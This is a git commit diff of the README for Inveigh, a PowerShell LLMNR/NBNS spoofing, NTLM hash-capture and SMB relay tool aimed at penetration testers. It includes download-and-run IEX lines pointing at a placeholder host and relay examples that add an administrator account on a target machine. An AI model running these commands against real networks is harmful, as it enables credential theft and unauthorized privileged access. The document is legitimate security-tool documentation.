diff options
| author | Kevin Robertson <robertsonk@gmail.com> | 2016-09-13 18:58:15 -0400 |
|---|---|---|
| committer | Kevin Robertson <robertsonk@gmail.com> | 2016-09-13 18:58:15 -0400 |
| commit | 73e2f3d442fc63925fa79a980fbce9d5c8a571af (patch) | |
| tree | 0dc9f25574b966418e93f8e56098820b8db97457 /README.md | |
| parent | 747b0d1f2fff960e378776a3cdcc9fd857a387dc (diff) | |
| download | Inveigh-73e2f3d442fc63925fa79a980fbce9d5c8a571af.tar.gz Inveigh-73e2f3d442fc63925fa79a980fbce9d5c8a571af.zip | |
Inveigh 1.21.2
1. Added Inveigh-Unprivileged.ps1 (replaces Inveigh-BruteForce.ps1) –
This script contains only LLMNR/NBNS spoofing and hash capture methods
that do not require local admin access. The NBNS spoofer can be used
without disabling the local NBNS service. The LLMNR spoofer does require
stopping (needs admin) the local service and freeing up port 5355. It
will work without admin on a system with LLMNR disabled. Note that there
can still be systems configurations that will prevent
Inveigh-Unprivileged from working, and require admin access to change
(e.g. local firewall blocking traffic, LLMNR enabled). This script
replaces Inveigh-BruteForce and contains the same functionality.
2. Inveigh.ps1 Updates - Added a learning mode (SpooferLearning
parameter) to Invoke-Inveigh that will attempt to avoid spoofing
requests for valid hostnames. If enabled, Inveigh will send out
LLMNR/NBNS requests for hostnames received through incoming LLMNR/NBNS
requests. If Inveigh receives a response for a sent requests, it will
add the hostname to a blacklist. Added some some code to help keep track
or the SMB capture sequence. Removed the ability to launch
Invoke-InveighRelay directly from an Invoke-Inveigh command line.
3. Inveigh-Relay.ps1 Status - This one is due for an overhhaul. I'm also
considering trying to convert it to not require admin access. No real
changes on this pass though. It will work with either Invoke-Inveigh
(-HTTP N and/or -HTTPS N) or Invoke-InveighUnprivileged (-HTTP N) as
long as the target system supports SMB1.
4. Support Functions - Merged all of the small Get functions into
Get-Inveigh.
5. Extras – Added an extras directory for functions that don’t fit the
main scripts.
a. Send-NBNSResponse – This function sends a crafted NBNS response
packet to a specific target. For name resolution to be successful, the
specified TargetIP, Hostname, and TransactionID must match a very (very
very) recent NBNS request. You must have an external method
(wireshark,etc) of viewing the required NBNS request fields for traffic
on the target subnet. The odds of pulling this attack off manually are
slim due to the narrow response window. I've only been able to get it to
work manually by watching tshark with the the transaction ID being
listed in the output. Ideally, this function would be fed by another
script.
b. Send-LLMNResponse – Just like Send-NBNSResponse but even harder to
use manually.
c. Invoke-NBNSC2 - Invoke-NBNSC2 will listen for NBNS requests and
execute set commands if requests for specific hostnames are received.
The function must be supplied with an even number of Hostnames and
Commands. NBNS requests can be sent from a NBNS enabled system on the
same subnet using ping, etc.
Diffstat (limited to 'README.md')
| -rw-r--r-- | README.md | 293 |
1 files changed, 161 insertions, 132 deletions
@@ -1,7 +1,42 @@ # Inveigh Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool designed to assist penetration testers that find themselves limited to a Windows system. -## Functions +## Included In +* PowerShell Empire - https://github.com/PowerShellEmpire/Empire +* PS>Attack - https://github.com/jaredhaight/psattack +* p0wnedShell - https://github.com/Cn33liz/p0wnedShell + +## Special Thanks +* Anyone that posted .NET packet sniffing examples. +* Responder - https://github.com/SpiderLabs/Responder +* Impacket - https://github.com/CoreSecurity/impacket + +## Import +* To import with Import-Module: + Import-Module ./Inveigh.psd1 + +* To import using the dot source method: + . ./Inveigh.ps1 + . ./Inveigh-BruteForce.ps1 + . ./Inveigh-Relay.ps1 + +* To load into memory using Invoke-Expression: + IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1") + IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh-Unprivileged.ps1") + IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh-Relay.ps1") + +## System Requirements +* Tested minimums are PowerShell 2.0 and .NET 3.5 + +## Functions +* Invoke-Inveigh +* Invoke-InveighUnprivileged +* Invoke-InveighRelay +* Clear-Inveigh +* Get-Inveigh +* Stop-Inveigh +* Watch-Inveigh + ### Invoke-Inveigh * The main Inveigh LLMNR/NBNS spoofer function. @@ -20,101 +55,146 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design ##### Notes: * LLMNR/NBNS spoofing is performed by packet sniffing and responding through raw sockets. * SMB challenge/response captures are performed by sniffing over the host system's SMB service. +* The local LLMNR/NBNS services do not need to be disabled on the host system. +* LLMNR/NBNS spoofer will point victims to host system's SMB service, keep account lockout scenarios in mind. +* Ensure that any needed LMMNR, NBNS, SMB, HTTP, HTTPS ports are open within any local firewall on the host system. +* If you copy/paste challenge/response captures from the console window for password cracking, ensure that there are no extra carriage returns. + +##### Examples: +* To execute with default settings: + Invoke-Inveigh + +* To load and execute with one line: + Import-Module ./Inveigh.ps1;Invoke-Inveigh + +* To execute with ConsoleOutput, FileOutput, and the NBNS spoofer enabled. + Invoke-Inveigh -ConsoleOutpuy Y -FileOutput Y -NBNS Y + +##### Screenshot: + ##### Parameters: -* __IP__ - Specify a specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the 'SpooferIP' parameter is not set. -* __SpooferIP__ - Specify an IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh host. -* __SpooferHostsReply__ - Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS. +* __IP__ - Specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the 'SpooferIP' parameter is not set. +* __SpooferIP__ - IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh host. +* __SpooferHostsReply__ - Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS. Listed hostnames will override the whitelist created through SpooferLearning. * __SpooferHostsIgnore__ - Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS. * __SpooferIPsReply__ - Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS. * __SpooferIPsIgnore__ - Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS. +* __SpooferLearning__ - Default = Disabled: (Y/N) Enable/Disable LLMNR/NBNS valid host learning. If enabled, Inveigh will send out LLMNR/NBNS requests for any received LLMNR/NBNS requests. If a response is received, Inveigh will add the hostname to a spoofing blacklist. The valid system must respond to the protocol type that matches the protocol of the original request in order to be blacklisted. +* __SpooferLearningDelay__ - (Interger) Time in minutes that Inveigh will delay spoofing while valid hosts are being blacklisted through SpooferLearning. +* __SpooferLearningInterval__ - Default = 30 Minutes: (Interger) Time in minutes that Inveigh wait before sending out an LLMNR/NBNS request for a hostname that has already been checked if SpooferLearning is enabled. * __SpooferRepeat__ - Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured. -* __LLMNR__ - Default = Enabled: (Y/N) Enable/Disable LLMNR spoofing. -* __LLMNRTTL__ - Default = 30 Seconds: Specify a custom LLMNR TTL in seconds for the response packet. -* __NBNS__ - Default = Disabled: (Y/N) Enable/Disable NBNS spoofing. -* __NBNSTTL__ - Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet. +* __LLMNR__ - Default = Enabled: (Y/N) Enable/Disable LLMNR spoofer. +* __LLMNRTTL__ - Default = 30 Seconds: LLMNR TTL in seconds for the response packet. +* __NBNS__ - Default = Disabled: (Y/N) Enable/Disable NBNS spoofer. +* __NBNSTTL__ - Default = 165 Seconds: NBNS TTL in seconds for the response packet. * __NBNSTypes__ - Default = 00,20: Comma separated list of NBNS types to spoof. Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name * __HTTP__ - Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture. * __HTTPS__ - Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. If the function does not exit gracefully, execute "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the cert store. -* __HTTPAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests. -* __HTTPBasicRealm__ - Specify a realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. -* __HTTPDir__ - Specify a full directory path to enable hosting of basic content through the HTTP/HTTPS listener. -* __HTTPDefaultFile__ - Specify a filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used for wpad.dat requests. -* __HTTPDefaultEXE__ - Specify an EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for EXE requests. -* __HTTPResponse__ - Specify a string or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. This parameter will not be used if HTTPDir is set. Use PowerShell character escapes where necessary. -* __HTTPSCertAppID__ - Specify a valid application GUID for use with the ceriticate. -* __HTTPSCertThumbprint__ - Specify a certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current working directory and named Inveigh.pfx. -* __WPADAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. +* __HTTPAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests. Note that Microsoft has changed the behavior of WDAP through NBNS in the June 2016patches. A WPAD enabled browser may now trigger NTLM authentication after sending out NBNS requests to random hostnames and connecting to the root of the web server. +* __HTTPBasicRealm__ - Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. +* __HTTPDir__ - Full directory path to enable hosting of basic content through the HTTP/HTTPS listener. +* __HTTPDefaultFile__ - Filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used for wpad.dat requests. +* __HTTPDefaultEXE__ - EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for EXE requests. +* __HTTPResponse__ - String or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. This parameter will not be used if HTTPDir is set. Use PowerShell character escapes where necessary. +* __HTTPSCertAppID__ - Valid application GUID for use with the ceriticate. +* __HTTPSCertThumbprint__ - Certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current working directory and named Inveigh.pfx. +* __WPADAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. * __WPADEmptyFile__ - Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests. Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when using WPADIP, WPADPort, or WPADResponse. -* __WPADIP__ - Specify a proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort. -* __WPADPort__ - Specify a proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP. +* __WPADIP__ - Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort. +* __WPADPort__ - Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP. * __WPADDirectHosts__ - Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the defined proxy. -* __WPADResponse__ - Specify wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set. Use PowerShell character escapes where necessary. +* __WPADResponse__ - wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set. Use PowerShell character escapes where necessary. * __SMB__ - Default = Enabled: (Y/N) Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still direct targets to the host system's SMB server. Block TCP ports 445/139 or kill the SMB services if you need to prevent login requests from being processed by the Inveigh host. -* __Challenge__ - Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures. -* __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. -* __SMBRelay__ - Default = Disabled: (Y/N) Enable/Disable SMB relay. Note that Inveigh-Relay.ps1 must be loaded into memory. -* __SMBRelayTarget__ - IP address of system to target for SMB relay. -* __SMBRelayCommand__ - Command to execute on SMB relay target. Use PowerShell character escapes where necessary. -* __SMBRelayUsernames__ - Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format. -* __SMBRelayAutoDisable__ - Default = Enable: (Y/N) Automaticaly disable SMB relay after a successful command execution on target. -* __SMBRelayNetworkTimeout__ - Default = No Timeout: (Integer) Set the duration in seconds that Inveigh will wait for a reply from the SMB relay target after each packet is sent. +* __Challenge__ - Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures. +* __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. * __ConsoleOutput__ - Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. -* __ConsoleStatus__ - Default = Disabled: (Integer) Set interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions. +* __ConsoleStatus__ - Default = Disabled: (Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions. * __ConsoleUnique__ - Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time console output is enabled. * __FileOutput__ - Default = Disabled: (Y/N) Enable/Disable real time file output. * __FileUnique__ - Default = Enabled: (Y/N) Enable/Disable outputting challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time file output is enabled. * __StatusOutput__ - Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages. * __OutputStreamOnly__ - Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled. -* __OutputDir__ - Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must also be enabled. +* __OutputDir__ - Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be enabled. * __ShowHelp__ - Default = Enabled: (Y/N) Enable/Disable the help messages at startup. -* __RunTime__ - Default = Unlimited: (Integer) Set the run time duration in minutes. +* __RunTime__ - Default = Unlimited: (Integer) Run time duration in minutes. * __Inspect__ - (Switch) Disable LLMNR, NBNS, HTTP, HTTPS, and SMB in order to only inspect LLMNR/NBNS traffic. * __Tool__ - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire -### Invoke-InveighBruteForce -* The remote (Hot Potato method)/unprivileged NBNS brute force spoofer function. This function can be used to perform NBNS spoofing across subnets and/or perform NBNS spoofing without an elevated administrator or SYSTEM shell. +### Invoke-InveighUnprivileged +* Inveigh LLMNR/NBNS spoofer function that does not require local administrator access. ##### Privilege Requirements: * Regular User ##### Features: +* IPv4 NBNS spoofer with granular control that can be run with or without disabling the local NBNS service +* IPv4 LLMNR spoofer with granular control that can be run only with the local LLMNR service disabled * Targeted IPv4 NBNS brute force spoofer with granular control * NTLMv1/NTLMv2 challenge/response capture over HTTP +* Basic auth cleartext credential capture over HTTP +* WPAD server capable of hosting a basic or custom wpad.dat file +* HTTP server capable of hosting limited content * Granular control of console and file output * Run time control -##### Notes: -* Microsoft released patches in June 2016 that will likely prevent some of this function's features from working. +##### Notes: +* The local NBNS service does not need to be disabled on the host system. +* Ensure that any needed LMMNR, NBNS, HTTP ports are open within any local firewall on the host system. +* Migrating/injecting into a process that has already been allowed incoming/outgoing firewall access should also work. +* If you copy/paste challenge/response captures from the console window for password cracking, ensure that there are no extra carriage returns. +* Microsoft released patches in June 2016 that will likely prevent some of this function's brute force features from working the way they did before June. + +##### Examples: +* To execute with default settings: + Invoke-InveighUnprivileged + +* To execute with ConsoleOutput and FileOutput enabled and a run time of 30 minutes. + Invoke-InveighUnprivileged -ConsoleOutpuy Y -FileOutput Y -RunTime 30 + +##### Screenshot: + ##### Parameters: -* __SpooferIP__ - Specify an IP address for NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh Brute Force host. -* __SpooferTarget__ - Specify an IP address to target for brute force NBNS spoofing. -* __Hostname__ - Default = WPAD: Specify a hostname for NBNS spoofing. -* __NBNS__ - Default = Disabled: (Y/N) Enable/Disable NBNS spoofing. -* __NBNSPause__ Default = Disabled: (Integer) Specify the number of seconds the NBNS brute force spoofer will stop spoofing after an incoming HTTP request is received. -* __NBNSTTL__ - Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet. +* __SpooferIP__ - IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh Unprivileged host. +* __SpooferTarget__ - IP address to target for brute force NBNS spoofing. +* __SpooferHostsReply__ - Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS. +* __SpooferHostsIgnore__ - Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS. +* __SpooferIPsReply__ - Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS. +* __SpooferIPsIgnore__ - Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS. +* __SpooferRepeat__ - Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured. +* __LLMNR__ - Default = Enabled: (Y/N) Enable/Disable LLMNR spoofer. +* __LLMNRTTL__ - Default = 30 Seconds: LLMNR TTL in seconds for the response packet. +* __NBNS__ - Default = Disabled: (Y/N) Enable/Disable NBNS spoofer. +* __NBNSTTL__ - Default = 165 Seconds: NBNS TTL in seconds for the response packet. +* __NBNSTypes__ - Default = 00,20: Comma separated list of NBNS types to spoof. Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name +* __NBNSBruteForce__ - Default = Disabled: (Y/N) Enable/Disable NBNS brute force spoofer. +* __NBNSBruteForceHost__ - Default = WPAD: Hostname for NBNS brute force spoofer. +* __NBNSBruteForcePause__ Default = Disabled: (Integer) Time in seconds the NBNS brute force spoofer will stop spoofing after an incoming HTTP request is received. * __HTTP__ - Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture. -* __HTTPIP__ - Default = Any: Specify a TCP IP address for the HTTP listener. -* __HTTPPort__ - Default = 80: Specify a TCP port for the HTTP listener. -* __HTTPAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests. -* __HTTPBasicRealm__ - Specify a realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. Use PowerShell character escapes where necessary. -* __HTTPResponse__ - Specify a string or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. -* __WPADAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. -* __WPADIP__ - Specify a proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort. -* __WPADPort__ - Specify a proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP. +* __HTTPIP__ - Default = Any: IP address for the HTTP listener. +* __HTTPPort__ - Default = 80: TCP port for the HTTP listener. +* __HTTPAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests. Note that Microsoft has changed the behavior of WDAP through NBNS in the June 2016patches. A WPAD enabled browser may now trigger NTLM authentication after sending out NBNS requests to random hostnames and connecting to the root of the web server. +* __HTTPBasicRealm__ - Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. Use PowerShell character escapes where necessary. +* __HTTPResponse__ - String or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. +* __WPADAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. +* __WPADEmptyFile__ - Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests. Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when using WPADIP, WPADPort, or WPADResponse. +* __WPADIP__ - Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort. +* __WPADPort__ - Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP. * __WPADDirectHosts__ - Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the defined proxy. -* __WPADResponse__ - Specify wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set. Use PowerShell character escapes where necessary. -* __Challenge__ - Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures. +* __WPADResponse__ - wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set. Use PowerShell character escapes where necessary. +* __Challenge__ - Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures. * __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. -* __ConsoleOutput__ - Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. +* __ConsoleStatus__ - Default = Disabled: (Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions. +* __ConsoleUnique__ - Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time console output is enabled. * __FileOutput__ - Default = Disabled: (Y/N) Enable/Disable real time file output. +* __FileUnique__ - Default = Enabled: (Y/N) Enable/Disable outputting challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time file output is enabled. * __StatusOutput__ - Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages. * __OutputStreamOnly__ - Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh Brute Force through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled. -* __OutputDir__ - Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must also be enabled. +* __OutputDir__ - Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be enabled. * __ShowHelp__ - Default = Enabled: (Y/N) Enable/Disable the help messages at startup. -* __RunCount__ - Default = Unlimited: (Integer) Set the number of captures to perform before auto-exiting. -* __RunTime__ - Default = Unlimited: (Integer) Set the run time duration in minutes. +* __RunCount__ - Default = Unlimited: (Integer) Number of captures to perform before auto-exiting. +* __RunTime__ - Default = Unlimited: (Integer) Run time duration in minutes. * __Tool__ - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire ### Invoke-InveighRelay @@ -127,16 +207,27 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design * HTTP/HTTPS to SMB NTLMv2 relay with granular control * NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS * Granular control of console and file output -* Can be executed as either a standalone function or through Invoke-Inveigh + +##### Examples: +* To execute with basic options: + Invoke-Inveigh -HTTP N + Invoke-InveighRelay -SMBRelayTarget 192.168.1.50 -SMBRelayCommand "net user Inveigh Summer2016 /add && net localgroup administrators Inveigh /add" + +* To execute with and only perform SMB relay with the 'Administrator' account: + Invoke-InveighUnprivileged -HTTP N + Invoke-InveighRelay -SMBRelayTarget 192.168.1.50 -SMBRelayCommand "net user Inveigh Summer2016 /add && net localgroup administrators Inveigh /add" -SMBRelayUsernames Administrator + +##### Screenshot: + ##### Parameters: * __HTTP__ - Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture. * __HTTPS__ - Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. If the script does not exit gracefully, execute "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the cert store. -* __HTTPSCertAppID__ - Specify a valid application GUID for use with the ceriticate. -* __HTTPSCertThumbprint__ - Specify a certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current working directory and named Inveigh.pfx. -* __Challenge__ - Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be pulled from the SMB relay target. +* __HTTPSCertAppID__ - Valid application GUID for use with the ceriticate. +* __HTTPSCertThumbprint__ - Certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current working directory and named Inveigh.pfx. +* __Challenge__ - Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be pulled from the SMB relay target. * __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. -* __WPADAuth__ - Default = NTLM: (Anonymous,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. +* __WPADAuth__ - Default = NTLM: (Anonymous,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. * __SMBRelayTarget__ - IP address of system to target for SMB relay. * __SMBRelayCommand__ - Command to execute on SMB relay target. Use PowerShell character escapes where necessary. * __SMBRelayUsernames__ - Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format. @@ -146,82 +237,20 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design * __FileOutput__ - Default = Disabled: (Y/N) Enable/Disable real time file output. * __StatusOutput__ - Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages. * __OutputStreamOnly__ - Default = Disabled: Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh Relay through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled. -* __OutputDir__ - Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must also be enabled. +* __OutputDir__ - Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be enabled. * __ShowHelp__ - Default = Enabled: (Y/N) Enable/Disable the help messages at startup. -* __RunTime__ - Default = Unlimited: (Integer) Set the run time duration in minutes. +* __RunTime__ - Default = Unlimited: (Integer) Run time duration in minutes. * __Tool__ - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire +##### Notes: +* Ensure that any needed HTTP, HTTPS ports are open within any local firewall on the host system. +* If you copy/paste challenge/response captures from the console window for password cracking, ensure that there are no extra carriage returns. + ### Support Functions -* __Get-Inveigh__ - Get queued console output -* __Get-InveighCleartext__ - Get all captured cleartext credentials -* __Get-InveighLog__ - Get log entries -* __Get-InveighNTLMv1__ - Get all or unique (-unique) captured NTLMv1 challenge/response hashes -* __Get-InveighNTLMv2__ - Get all or unique (-unique) captured NTLMv2 challenge/response hashes -* __Watch-Inveigh__ - Enable real time console output * __Clear-Inveigh__ - Clear Inveigh data from memory +* __Get-Inveigh__ - Get Inveigh data from memory - Parameters: Console, ClearText, CleartextUnique, Learning, Log, NTLMv1, NTLMv1Unique, NTLMv1Usernames, NTLMv2, NTLMv2Unique, NTLMv2Usernames * __Stop-Inveigh__ - Stop all running Inveigh functions +* __Watch-Inveigh__ - Enable real time console output -## Miscellaneous Notes -* The local LLMNR/NBNS services do not need to be disabled on the host system. -* LLMNR/NBNS spoofer will point victims to host system's SMB service, keep account lockout scenarios in mind. -* Kerberos should downgrade for SMB authentication due to spoofed hostnames not being valid in DNS. -* Ensure that any needed LMMNR,NBNS,SMB,HTTP,HTTPS ports are open within any local firewall on the host system. -* If you copy/paste challenge/response captures from the console window for password cracking, ensure that there are no extra carriage returns. - -## System Requirements -* Tested minimums are PowerShell 2.0 and .NET 3.5 - -## Usage -* To import with Import-Module: - Import-Module ./Inveigh.psd1 - -* To import using dot source method: - . ./Inveigh.ps1 - . ./Inveigh-BruteForce.ps1 - . ./Inveigh-Relay.ps1 - -* To load into memory using Invoke-Expression: - IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1") - IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh-Relay.ps1") - -## Examples -* To execute with default settings: - Invoke-Inveigh - -* To load and execute with one line: - Import-Module ./Inveigh.ps1;Invoke-Inveigh - -* To execute with parameters (Use 'Get-Help -parameter * Invoke-Inveigh' for a full list of parameters): - Invoke-Inveigh -IP 'local IP' -SpooferIP 'local or remote IP' -LLMNR Y/N -NBNS Y/N -NBNSTypes 00,03,20,1B -HTTP Y/N -HTTPS Y/N -SMB Y/N -Repeat Y/N -ConsoleOutput Y/N -FileOutput Y/N -OutputDir 'valid folder path' - -* To execute with SMB relay enabled through Invoke-Inveigh: - Invoke-Inveigh -SMBRelay Y -SMBRelayTarget 'valid SMB target IP' -SMBRelayCommand "valid command to run on target" - -* To execute SMB relay with only Invoke-InveighRelay: - Invoke-InveighRelay -SMBRelayTarget 'valid SMB target IP' -SMBRelayCommand "valid command to run on target" - -* To execute Inveigh-BruteForce against a target: - Invoke-InveighRelay -SpooferTarget 'remote or local target IP' - -## Included In -* PowerShell Empire - https://github.com/PowerShellEmpire/Empire -* PS>Attack - https://github.com/jaredhaight/psattack -* p0wnedShell - https://github.com/Cn33liz/p0wnedShell - -## Special Thanks -* Anyone that posted .NET packet sniffing examples. -* Responder - https://github.com/SpiderLabs/Responder -* Impacket - https://github.com/CoreSecurity/impacket - -## 